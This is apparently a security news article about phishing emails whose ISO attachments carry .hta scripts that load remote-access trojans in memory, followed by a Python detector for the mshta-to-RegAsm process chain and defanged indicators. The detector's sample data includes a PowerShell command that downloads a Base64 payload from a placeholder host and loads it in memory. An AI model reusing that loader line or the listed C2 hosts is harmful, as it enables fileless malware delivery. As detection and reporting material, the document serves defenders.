Beware of New Fileless Malware that Propagates Through Spam Mail

by Esmeralda McKenzie

Recent reports indicate that threat actors are using phishing emails to distribute fileless malware. The attachment carries a .hta (HTML Application) file, which in turn is used to deploy other malware such as AgentTesla, Remcos, and LimeRAT.

The fileless payload is in Portable Executable (PE) format and is executed without ever being written to disk on the victim's machine. The phishing email's body poses as a bank transfer notice, and the email carries an ISO image attachment with an embedded .hta script file. That script runs via mshta.exe (the Microsoft HTML Application host).


Fileless Malware Via Spam Mail

According to reports shared with Cyber Security News, when a victim opens the ISO file, the embedded .hta file is executed, creating a process tree consisting of mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe, in that order.

ISO file embedded with .hta file (Source: AhnLab)

The mshta.exe process launches a PowerShell command. Its arguments fetch a Base64-encoded string from the attacker's server (DownloadString), decode it, and pass the resulting bytes to AppDomain.CurrentDomain.Load so that a function in the loaded assembly can be called. No PE file is created on disk; instead, the binary is executed entirely within the memory space of the PowerShell process.

Payload download and in-memory execution (Source: AhnLab)

The PowerShell script also runs a DLL decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into RegAsm.exe (the .NET Assembly Registration Tool). The final binary can be any malware such as Remcos, AgentTesla, or LimeRAT.
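The chain described above (mshta.exe spawning cmd.exe, then powershell.exe with a DownloadString/Assembly.Load loader, then RegAsm.exe as the injection target) is easy to hunt for in endpoint telemetry because each stage is a distinct process-creation event. The script below is an added example, not code from the article or from the AhnLab report: it rebuilds process ancestry from Sysmon-style process-creation records and flags both the parent chain and the in-memory loader keywords. The event fields, PIDs, paths and the TEST-NET URL in the sample are all constructed for illustration.

```python
"""Detect the mshta -> cmd -> powershell -> RegAsm chain in process events.

Added example: the event format (pid, ppid, image, cmdline) mirrors Sysmon
Event ID 1 fields but the records below are constructed, not real telemetry.
"""
from dataclasses import dataclass
import re


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Constructed sample events (PIDs and paths are arbitrary, URL is TEST-NET).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "E:\invoice.hta"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -w hidden -c "..."'),
    ProcEvent(400, 300,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c "
              "$s=(New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.txt');"
              "[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($s))"),
    ProcEvent(500, 400,
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              "RegAsm.exe"),
    # Benign control: an admin console PowerShell with no mshta.exe ancestor.
    ProcEvent(600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(700, 600,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]

# Keywords that appear in the loader stage described in the report.
LOADER_PATTERN = re.compile(
    r"DownloadString|FromBase64String|CurrentDomain\.Load|Assembly\]::Load",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from `pid` up to the root, nearest first.

    A `seen` set guards against PID reuse creating a cycle in the table.
    """
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return (pid, reason, chain) tuples for events matching the pattern."""
    alerts = []
    for e in events:
        name = basename(e.image)
        chain = ancestry(events, e.pid)
        shown = " <- ".join(chain)
        # Stage 2/3: PowerShell anywhere beneath mshta.exe is itself unusual.
        if name == "powershell.exe" and "mshta.exe" in chain:
            reason = "powershell.exe descends from mshta.exe"
            if LOADER_PATTERN.search(e.cmdline):
                reason += " and carries in-memory loader keywords"
            alerts.append((e.pid, reason, shown))
        # Stage 4: RegAsm.exe started directly by PowerShell is a classic
        # hollowing/injection target rather than a normal developer action.
        if name == "regasm.exe" and len(chain) > 1 and chain[1] == "powershell.exe":
            alerts.append((e.pid, "RegAsm.exe spawned by powershell.exe", shown))
    return alerts


if __name__ == "__main__":
    for pid, reason, chain in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}\n    {chain}")
```

Both rules deliberately match on ancestry rather than on an exact parent, so the detection still fires if an intermediate cmd.exe is dropped or another hop is inserted; the benign PowerShell session (pid 700) is not reported because mshta.exe never appears in its chain.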

Base64 encoded DLL

A full report has been published by AhnLab, giving detailed information about the malware, the PE file, the DLL file, and more.

Indicators of Compromise (detection names as published by AhnLab; URLs are defanged)

Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)


Source credit : cybersecuritynews.com
